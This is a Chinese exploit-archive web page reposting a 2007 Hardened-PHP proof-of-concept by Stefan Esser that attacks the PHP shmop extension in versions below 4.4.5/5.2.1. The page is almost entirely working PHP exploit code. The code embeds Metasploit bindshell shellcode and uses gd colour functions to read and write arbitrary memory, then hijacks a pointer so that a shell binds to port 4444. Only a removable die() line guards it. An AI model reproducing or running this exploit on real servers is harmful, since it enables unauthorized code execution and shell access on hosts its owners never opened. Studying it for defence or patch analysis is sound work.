PHP < 4.4.5 / 5.2.1 (shmop Functions) Local Code Execution Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

PHP < 4.4.5 / 5.2.1 (shmop Functions) Local Code Execution Exploit

来源：Hardened-PHP 作者：Stefan 发布时间：2007-03-08

<?php
////////////////////////////////////////////////////////////////////////
// _ _                _                     _       ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _   ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_|     |_| |_||_||_|   //
//                                                                    //
//         Proof of concept code from the Hardened-PHP Project        //
//                   (C) Copyright 2007 Stefan Esser                  //
//                                                                    //
////////////////////////////////////////////////////////////////////////
//                PHP ext/shmop Code Execution Exploit                //
////////////////////////////////////////////////////////////////////////

// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");

if (!extension_loaded("gd") || !extension_loaded("shmop")) {
    die("This demonstration exploit only works with ext/gd and ext/shmop loaded.");
}

// This exploit contains a bindshell shellcode for linux x86 from metasploit
// Therefore it only works with linux x86. It only works in PHP < 5.2.0 because
// it searches for the shellcode by simply scanning the Apache memory
// which is not possible with the new memory manager anymore

$shellcode = "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
      "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
      "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
      "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
      "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
      "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
      "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";

function init()
{
    global $rid;

    $rid = imagecreate(10,10);
    imagecolorallocate($rid, 0, 0, 0);
    imagecolorallocate($rid, 0, 0, 0);
}

function peek($addr, $size)
{
    global $rid;
    imagecolordeallocate($rid, 0);
    imagecolordeallocate($rid, 1);
    imagecolorallocate($rid, $addr, 0, 0);
    imagecolorallocate($rid, $size, 0, 0);
    return shmop_read((int)$rid, 0, $size);
}

function poke($addr, $val)
{
    global $rid;
    imagecolordeallocate($rid, 0);
    imagecolordeallocate($rid, 1);
    imagecolorallocate($rid, $addr, 0, 0);
    imagecolorallocate($rid, strlen($val), 0, 0);
    return shmop_write((int)$rid, $val, 0);
}

init();

$arr = array();
for ($i=0; $i<129; $i++) { $arr[$i] = ""; }
$arr[$shellcode] = 1;
for ($i=0; $i<129; $i++) { unset($arr[$i]); }

$offset = 0x08048000 + 1024 * 64;

while (1) {

    $data = peek($offset, 1024 + 16);

    $position = strpos($data, "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00");
    if ($position !== false && $position < 1024) {

      $addr = unpack("L", peek($offset+$position+24, 4));
      $addr = $addr[1] + 32;
      $addr = pack("L", $addr);

      poke($offset+$position+32, $addr);

      echo "There should be a shell bound to port 4444 now\n\n";
      unset($arr);
      die();
    }
    $offset += 1024;
}
?>

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告